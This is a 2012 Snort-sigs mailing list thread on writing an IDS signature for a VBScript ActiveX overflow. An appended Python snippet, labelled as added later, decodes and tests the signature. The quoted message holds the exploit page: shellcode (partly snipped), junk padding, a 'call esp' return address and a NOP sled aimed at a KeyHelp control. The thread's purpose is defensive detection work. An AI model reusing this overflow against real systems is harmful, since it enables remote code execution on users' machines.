[Snort-sigs] Problem writing a sig to capture vbscript unescape sequence

Balasubramaniam Natarajan bala150985 at ...2420...
Sat May 19 02:36:16 EDT 2012


Hi Bob,

See if this works

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Possible ActiveX overflow via VB Script"; flow:established,from_server; content:"|65 69 70 20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 36 37 25 34 31 25 34 31 25 37 65 22 29|"; sid:10000111; rev:1;)

On Fri, May 18, 2012 at 11:22 PM, Bob Huber <roberthuberjr at ...144...> wrote:

> I'm trying to write a sig for this ActiveX overflow:
>
> <html>
> <body>
> <object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C'
> id='KEYHELPLib' />
> </object>
> <script language='vbscript'>
> //executing calc
> scode =      unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49")
> & _
>              ...SNIP...
>              unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
> jnk = string(537,"A")
> eip = unescape("%67%41%41%7e") '0x7E414167      call esp user32.dll
> nop = string(16,unescape("%90"))
> mapID=1
> pstrChmFile= jnk + eip + nop + scode
> pstrFrame="aaaaaaaa"
> 'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
> KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
> </script>
> </body>
> </html>
>
> The problem I'm having is trying to get a content match off of the line -
>    eip = unescape("%67%41%41%7e")
> I can't figure out how to match that content.  I'm running both 2.8.5 and
> 2.9.2.  I was assuming it would see the <script> tag and it would try to
> decode javascript, and maybe that was the problem.  I've tried file_data,
> I've tried pkt_data. I've turned off javascript normalization, I've turned
> off extended_response_inspection.  No luck.
>
> Any help appreciated.
>
> Bob



-- 
Regards,
Balasubramaniam Natarajan
www.etutorshop.com/moodle/
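A small check, added here and not part of the thread, that decodes the posted rule's content option into the bytes Snort would look for and runs it over a constructed response body; it also shows why a byte-exact content misses a trivially reformatted copy of the same line, and what a looser pattern (the kind a Snort pcre option would carry) catches instead. The sample bodies and the regex are my own constructions, not anything from the list.

```python
import re

# Content option exactly as it appears in the rule posted above.
RULE_CONTENT = ('|65 69 70 20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 36 37 25 34 31 '
                '25 34 31 25 37 65 22 29|')


def snort_content_to_bytes(content: str) -> bytes:
    """Convert a Snort content string to raw bytes.

    Text between a pair of '|' characters is hex; everything else is
    taken literally, so mixed forms like 'eip = |75 6e|escape' also work.
    """
    out = bytearray()
    for i, part in enumerate(content.split('|')):
        if i % 2:                      # odd index: inside a |...| pair
            out.extend(bytes.fromhex(part))
        else:
            out.extend(part.encode('latin-1'))
    return bytes(out)


def content_matches(body: bytes, content: str = RULE_CONTENT) -> bool:
    """Byte-exact match, which is what a plain content option does."""
    return snort_content_to_bytes(content) in body


# Looser pattern: tolerate whitespace and case differences around the call.
# Constructed here; a Snort pcre option could express the same idea.
LOOSE_PATTERN = re.compile(rb'eip\s*=\s*unescape\(\s*"%67%41%41%7e"\s*\)', re.I)


def loose_matches(body: bytes) -> bool:
    return LOOSE_PATTERN.search(body) is not None


# Constructed sample bodies (not real captures). The first reproduces the
# line from the quoted page; the second is the same statement with the
# spacing and case changed, which the byte-exact content does not see.
SAMPLE_BODY = (b"<script language='vbscript'>\r\n"
               b"eip = unescape(\"%67%41%41%7e\") '0x7E414167\r\n"
               b"</script>")
VARIANT_BODY = b"EIP=Unescape(\"%67%41%41%7E\")"

if __name__ == "__main__":
    print("decoded content:", snort_content_to_bytes(RULE_CONTENT))
    print("exact / loose on sample :", content_matches(SAMPLE_BODY), loose_matches(SAMPLE_BODY))
    print("exact / loose on variant:", content_matches(VARIANT_BODY), loose_matches(VARIANT_BODY))
```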